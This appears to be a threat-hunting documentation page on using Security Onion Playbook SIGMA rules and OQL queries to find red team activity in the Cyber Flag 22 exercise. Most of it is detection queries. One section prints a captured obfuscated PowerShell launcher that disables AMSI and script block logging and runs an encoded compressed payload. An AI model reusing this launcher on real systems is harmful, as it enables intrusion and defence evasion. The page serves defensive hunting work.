Hunting with Security Onion Playbook

A black background with white text Description automatically generated with low confidence

Summary

The ability to use SIGMA with Elasticsearch is one of the most powerful features that ships with Security Onion to date. “Playbook” is a docker container hosted on the Security Onion Manager which uses SIGMA rules to convert into elastic search queries. After this process is complete the analyst can activate the “Play” which will be used to analyze host logs ingested into the SIEM for any anomalies. The manner in which an alert is generated is solely based on the structure of the SIGMA Playbook rule. Luckily, Security Onion now has the ability to use over 1600 SIGMA rules which is extremely useful in tracking down malicious activity in Enterprise Environments. However, in order to eliminate false positives analysts will need to tune SIGMA rules and sift out know good processes that may alert for suspect activity.

Just recently Cyber Flag 22 offered a great venue to test just how powerful SIGMA rules could be when used with the Security Onion Playbook feature. After activating over 1600 host-based detection rules, tunning FP’s, and analyzing those hits in the “Dashboards” I was able to hunt more efficiently and effectively. Above you will see just how many hits I received over an 11-day period. LOTS! Below I took screenshots and pasted “Hunt” OQLs (Onion Query Language) to showcase just how quickly I was able to grouby, exclude, include, and analyze actual Red Team activity. Enjoy!

Example of Playbook SIGMA rule

Play #1223

Tunning SIGMA rules are rather simple. Analysts can manipulate these detection fields to create selection categories for more specific alerts and sift out FP’s base of endpoint activity.

SIGMA Converted Rule

Once the analysts have tunned SIGMA to their specification they may convert the rule by submitting the changes which will generate a new “Elastic Query” as seen below.

query: (event.code.security:"1" AND winlog.channel.security:"Microsoft\-Windows\-Sysmon\/Operational" AND (process.executable.security:(*\\net.exe OR *\\net1.exe) OR process.pe.original_file_name.security:("net.exe" OR "net1.exe")) AND process.command_line.security:(*\ group* OR *\ localgroup* OR *\ user* OR *\ view* OR *\ share* OR *\ accounts* OR *\ stop\ * OR *\ start*))

Results

Net.exe Execution

event.dataset: alert AND event.module: "playbook" AND rule.name: "Net.exe Execution" AND NOT event_data.process.parent.executable: "C:\\Program Files\\Puppet Labs\\Puppet\\sys\\ruby\\bin\\ruby.exe" AND NOT event_data.process.parent.command_line: "C:/Windows/system32/net.exe stop mcollective" AND NOT event_data.process.parent.command_line: "C:/Windows/system32/net.exe start mcollective" | groupby rule.name "event_data.agent.name" "event_data.user.name" "event_data.process.pid" "event_data.process.executable" "event_data.process.parent.executable" "event_data.process.parent.command_line"

A screenshot of a computer Description automatically generated
A screenshot of a computer Description automatically generated

Suspicious Remote Thread Created

event.dataset: alert AND event.module: "playbook" AND rule.name: "Suspicious Remote Thread Created" AND NOT event_data.winlog.event_data.SourceImage: "C:\\Windows\\Explorer.EXE" AND NOT event_data.agent.hostname: "airbase-mail" | groupby rule.name "event_data.agent.hostname" "event_data.winlog.event_data.SourceProcessId" "event_data.winlog.event_data.SourceImage" "event_data.winlog.event_data.TargetImage" "event_data.winlog.event_data.TargetUser"

A screenshot of a computer screen Description automatically generated
A close up of a computer Description automatically generated
A screenshot of a computer Description automatically generated
A screenshot of a video game Description automatically generated

Cobalt Strike Named Pipe

event.dataset: alert AND event.module: "playbook" AND rule.name: "CobaltStrike Named Pipe" | groupby rule.name "event_data.agent.name" "event_data.user.name" "event_data.process.pid" "event_data.process.executable" "event_data.winlog.event_data.PipeName"

A screenshot of a computer Description automatically generated
A screenshot of a computer Description automatically generated
A screen shot of a computer Description automatically generated

"Suspicious In-Memory Module Execution"

event.dataset: alert AND event.module: "playbook" AND rule.name: "Suspicious In-Memory Module Execution" AND NOT event_data.winlog.event_data.SourceImage: "C:\\Windows\\Explorer.EXE" AND NOT event_data.agent.hostname: "airbase-mail" | groupby rule.name "event_data.agent.hostname" "event_data.winlog.event_data.SourceProcessId" "event_data.winlog.event_data.SourceImage" "event_data.winlog.event_data.TargetImage" "event_data.winlog.event_data.TargetUser"

Common PID’s on hosts Good or Bad?

A screenshot of a computer Description automatically generated

Common PIDs on a different host, Good or Bad? Different processes…

A screenshot of a computer Description automatically generated

After excluding the same false positive PID we have a more focused result

A screenshot of a computer Description automatically generated
A screenshot of a computer Description automatically generated

"Query Registry"

event.dataset: alert AND event.module: "playbook" AND rule.name: "Query Registry" | groupby rule.name "event_data.agent.hostname" "event_data.process.executable" "event_data.process.parent.command_line"

WMI Event Subscription

event.dataset: alert AND event.module: "playbook" AND rule.name: "WMI Event Subscription" | groupby rule.name "event_data.agent.hostname" "event_data.winlog.event_data.EventNamespace" "event_data.winlog.event_data.Query"

Credentials Dumping Tools Accessing LSASS Memory

event.dataset: alert AND event.module: "playbook" AND rule.name: "Credentials Dumping Tools Accessing LSASS Memory" | groupby event.module | groupby rule.name "event_data.agent.hostname" "event_data.winlog.event_data.SourceProcessId" "event_data.winlog.event_data.SourceImage" "event_data.winlog.event_data.TargetImage"

Active Directory Replication from Non-Machine Account

event.dataset: alert AND event.module: "playbook" AND rule.name: "Active Directory Replication from Non Machine Account" | groupby rule.name "event_data.agent.name" "event_data.event.code" "event_data.user.name" "event_data.winlog.event_data.OperationType" "event_data.message"

CobaltStrike Service Installations in Registry

event.dataset: alert AND event.module: "playbook" AND rule.name: "CobaltStrike Service Installations in Registry" | groupby rule.name "event_data.agent.hostname" "event_data.process.pid" "event_data.process.executable" "event_data.winlog.event_data.TargetObject" "event_data.winlog.event_data.Details"

Example from Base-IT8

%%COMSPEC%% /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $t3=((''Enable''+''{''+''0}c{3}ip''+''{1}{''+''2}lockLog''+''ging'')-f''S'',''t'',''B'',''r''); $zk=[Collections.Generic.Dictionary[string,System.Object]]::new(); $yyziG=((''''+''Sc{''+''1}i{2}''+''t''+''B{0}ockLogging'')-f''l'',''r'',''p''); $qB=((''E''+''nabl''+''e''+''Sc{1}i''+''{0}t{4}loc''+''{3}In{''+''2}ocati''+''on{5}ogging'')-f''p'',''r'',''v'',''k'',''B'',''L'');If($PSVersionTable.PSVersion.Major -ge 3){ $e8=[Ref].Assembly.GetType(((''''+''{3''+''}{4}stem.''+''Management.{1}{2}''+''tomation.''+''{5}ti''+''{''+''0}s'')-f''l'',''A'',''u'',''S'',''y'',''U'')); $dY=[Ref].Assembly.GetType(((''{0}{''+''1}stem{''+''9}{4}''+''an''+''a''+''{''+''5}e''+''men''+''t{''+''9}{8}''+''{''+''3}''+''t{7}''+''ma''+''ti''+''{7}n{''+''9}{8}msi''+''{''+''6}ti{''+''2''+''}s'')-f''S'',''y'',''l'',''u'',''M'',''g'',''U'',''o'',''A'',''.'')); if ($dY) { $dY.GetField(((''a{''+''2}{''+''3}''+''iIn''+''i{4}''+''{0''+''}a''+''i{1''+''}ed'')-f''F'',''l'',''m'',''s'',''t''),''NonPublic,Static'').SetValue($null,$true); }; $vy=$e8.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($vy) { $ozf=$vy.GetValue($null); If($ozf[$yyziG]){ $ozf[$yyziG][$qB]=0; $ozf[$yyziG][$t3]=0; } $zk.Add($qB,0); $zk.Add($t3,0); $ozf[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$yyziG]=$zk; } Else { [Ref].Assembly.GetType(((''Sy''+''{2}t''+''em.{1}ana{5}eme''+''nt.Au''+''tomation''+''.Sc''+''{0}i{4}t''+''{3}l''+''ock'')-f''r'',''M'',''s'',''B'',''p'',''g'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAA''+''Lt52ICA7VX+4/iOBL+faX9H6IVEkFLQwJ0{1}4w00oVHC{1}0kPPLisa1TiA2YOHE6cXj07v7vV+Ex3XPTs5o7aSJFxHZVufzV56pinUU+JywSduOj8O''+''evvwjXZ+wlXiiIhaBTFgphd1Z6XSpsAyZ8EsSlEsddFnokevr4sZMlCY74ZVzpY66kKQ5XlOBULAl/Ce4WJ/hutNphnwt/CoV/V/qUrTx6FTt1PH+LhTslQvnakPle7lXFjCnhYvGPP4ql5Z38VOk9Zx5NxaJ5S''+''jkO''+''K4jSYkn4u5RvaJ1iLBZ14icsZWtecUlUr1XsKPXW2ABre6xjvmUoLcJZXk+TYJ4l0flQuZWLjFiEz3HCfAWhBKdpsSwsc/vLp6d/icvr5tMs4iTElUHEccJiEyd74uO0onkRoniK10+gZfKERJunUgnE9izAYiHKKC0L/4sZ0cCHG3Q/qiS+VQKpMU9KZYjnt8fUGcoovigW3/ETKFCC50o{1}wO7vHL71jTer+Tu0eZ24PcvzCgZvxTFLyVn1kyCVBR029j''+''hLTjAsWEmGS09fsIa''+''o6OUftSXfFEHt+GFnwdTSYQQ9vRr4KvCFlf6yo7nU93ncxWsS4e4p8kLi36gqvhcPvKb4{1}EjlJmaAi2LxuoBRF1O88XgOcU6Lb9R6IeFfdNsZoQgnig8xTcErCHfp''+''a2cuUROLg0jHIaB3GQNPC2u4IPgmfb0Up9vu+RiEih3qpWlZGGdwQ/2yYGKPYlQWlCgl1yUl4+z8WXx1V88oJ76X8pu5p9J/43ndt8OilCeZ{1}4EF{1}Cwzxj7xaA5JWdAIwu2TSTa3/YvvAtLxKIWrA5b2EBCYyYEweU6XBFwFapQqJua{1}MKY4BIlzwlCpt4H0cL0eZ3Z5G4yK3/Pzdg8upM+RuUHyxksIt0kZLwsOST''+''jknxzlnGH/hxPf5p2LN50EX6Mj3m7Ysn3i+SUorJycpFeAznAkHKBQExa2vRQ/NC45RvytOiJjBZ55VzMXA27qg4gSea{1}{1}a+vr5phLLCT1AdP9Tjruq02FH{1}YHv2koPnpEuGWC3IRIg6Z''+''z0OC33dj6bclStIk94PPBgA/6imZtfSqNu1rVnKcSOWiu7nfbL4daClRtNLSZpNTrjVFdCgC8OZE3gYKMkByOQ/iGZ{1}oatgdpWxrQ3mNnunJr6sKlWrWhbtcuS82HebdarbaQ17+nSGk''+''zVKOZ50yZpflhu1p1dMQtWzYs+/ft+''+''ZyW23rw3GM6N5vycKdsPqsoXoXTParrG4tONrqlZHo33Thgx9hNPgy0Tc2AsR/NH0aW''+''n+mdY{1}O''+''tOTuv1tzrO+Wod/O3t5mG9LRwF3vcad4bp8ZB6W8enCi''+''Mqi3HsmusCz482yPSUyaKMqw9bv0a3Q1rxtar2ftFj86mtjzW3YaM+vHeCZ3UcenJtJ3jomZMz{1}AOrF56''+''XKmtEM3mNV1CJ8d5dOcn+TRVUTi1aWxR2rU{1}2KXfCjz1kdg7de5pbbaSY''+''8/u+ycjiIe2s+3rAR8vNJXiPo2nblPSo55sB/RhZKsTHBky6tHpQjMSWzPYqOcEK2tK9PrWmNi8N7Gp7NlUQ6o6WcC5h47ygmhrZwSPttnd1q3e/LjqbiWrdj9dzbbpoo6eXfXRn{1}qIeX1EUaAO5mG8Nm376HbVGHWRh3vqo+c89kzJP3k1MN+bdk3puMVh42C/KBxJcrzqNQ4L2TlZEh8Cxob+okZuHx1NC01MSa/7QctEgTG0IupMZu2BoraZ0wjXx33VIf7C8hSl''+''4w2mOQ9mtrxg{1}7KdjYAbNGSfZzk3ZMP1OlK/r+2r8nymoOmUkbauKP1tr9mdbSCGY4Q''+''1Zm6AQP''+''1''+''YAXsQxTa{1}V1FUg7mfp9b9uuoEYItgNIN1kGxbTriBHBCRastV{1}5o1Jge/fWiAfezM{1}3KVrYG51Tqqo9M9mbuczmu9zJtNlOx3BX3exCyO3VYEdsfKotlh3Q8NzVYzybf8sPWsqOOqPPn06Te4+kub''+''RLxeeypA8LS8Qv76S+GwepMAvlf5dS9Jtx6FxAA1/ZafVZao10I9ZiTXEMW80QtwEmEK7RE0ULespl{1}K/LxHgIoO3cmlZ8hbGHtw9u''+''i9r5LwRb{1}02jrcpj5+XICLkCVXTmWIow3flqVjXZKg6ktHqXFOhz9+rA6LTyKYKu''+''ddA2BysUvPdsEUWQui+NNBgp6QQ336HkzfQww2{1}qCaQ''+''HW7pPgctzZj9C1q5yN9Cf8rZICV{1}Cde5p3gmRWgfYefhQLPm6W3zVchMH8qUa5Fags/6J+J8jr3{1}6s/RB6pnOPyzeTXE2+q+887vesR{1}oImlFqKL93feyBcL8abuAYm''+''0H59ffL/QqOM3xnQXZ8L/X8AYPV1KoENAAA{0}'')-f''='',''D'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"

Reg Add RUN Key

event.dataset: alert AND event.module: "playbook" AND rule.name: "Reg Add RUN Key" | groupby rule.name "event_data.host.name" "event_data.process.ppid" "event_data.process.parent.command_line"

Kerberos over Non-Standard Port

event.dataset: alert AND event.module: "playbook" AND rule.name: "Reg Add RUN Key" | groupby rule.name "event_data.host.name" "event_data.process.ppid" "event_data.process.parent.command_line"

DNS Hunting

11 Day Capture

PreviousSecurity Onion Playbook SIGMA RulesNextHunting Cobalt Strike with SO2

Last updated

Was this helpful?